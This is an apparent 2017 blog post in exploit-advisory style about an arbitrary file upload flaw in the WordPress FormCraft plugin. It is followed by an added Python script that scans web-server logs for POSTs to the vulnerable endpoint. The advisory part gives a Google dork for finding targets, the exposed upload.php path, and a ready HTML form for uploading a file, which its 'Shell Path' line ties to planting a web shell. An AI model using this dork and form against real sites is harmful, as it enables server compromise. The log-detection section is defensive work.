Monday, February 6, 2017
WordPress Plugins FormCraft File Upload

#- Title: WordPress Plugins FormCraft File Upload
#- Author: -
#- Date: -
#- Developer : AndonDesign
#- Link Download : wordpress.org/plugins/formcraft-form-builder
#- Google Dork: inurl:"/plugins/formcraft/"
#- Fixed in Version : -
#- Tested on : win
=======================================================
-- Proof Of Concept --
Vulnerable : /wp-content/plugins/formcraft/file-upload/server/php/upload.php
When Vuln : {"files":
CSRF :
<form method=POST action=http://victim.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php enctype=multipart/form-data><input type=file name=files[] /><button>Upload</button></form>
Shell Path : Here
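
For defenders, one way to check web-server access logs for POST requests to the endpoint above. This is an added example, not part of the original advisory; the combined log format, the function name find_upload_posts, the host blog.example and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Endpoint named in the advisory above.
UPLOAD_PATH = "/wp-content/plugins/formcraft/file-upload/server/php/upload.php"

# Assumption: Apache/nginx "combined" access-log format.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"'
)

def find_upload_posts(lines, site_host):
    """Return one finding per POST to the plugin's upload endpoint."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Drop the query string, decode %xx, collapse "//" and ignore case
        # so trivially rewritten paths still match.
        path = re.sub(r"/+", "/", unquote(m["target"].split("?", 1)[0])).lower()
        if path != UPLOAD_PATH:
            continue
        ref_host = urlsplit(m["referer"]).hostname  # None for "-" or empty
        findings.append({
            "ip": m["ip"],
            "time": m["ts"],
            "status": int(m["status"]),
            # The form in the PoC is served from another origin, so the
            # Referer host (if any) will not be the site's own.
            "cross_site": ref_host != site_host,
            "accepted": m["status"].startswith("2"),
        })
    return findings

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Feb/2017:10:12:01 +0000] "POST ' + UPLOAD_PATH
    + ' HTTP/1.1" 200 412 "http://other.example/p.html" "Mozilla/5.0"',
    '198.51.100.4 - - [06/Feb/2017:10:13:40 +0000] "GET ' + UPLOAD_PATH
    + ' HTTP/1.1" 200 15 "-" "curl/7.50"',
    '192.0.2.9 - - [06/Feb/2017:10:15:22 +0000] "POST /wp-content//plugins/'
    'FormCraft/file-upload/server/php/upload.php?x=1 HTTP/1.1" 403 199 "-" "-"',
    '192.0.2.33 - - [06/Feb/2017:10:16:02 +0000] "POST /wp-login.php HTTP/1.1"'
    ' 200 2100 "http://blog.example/wp-login.php" "Mozilla/5.0"',
]
```

Findings with accepted set to true mark uploads the server took; those hosts and timestamps are where to start looking for unexpected files on disk.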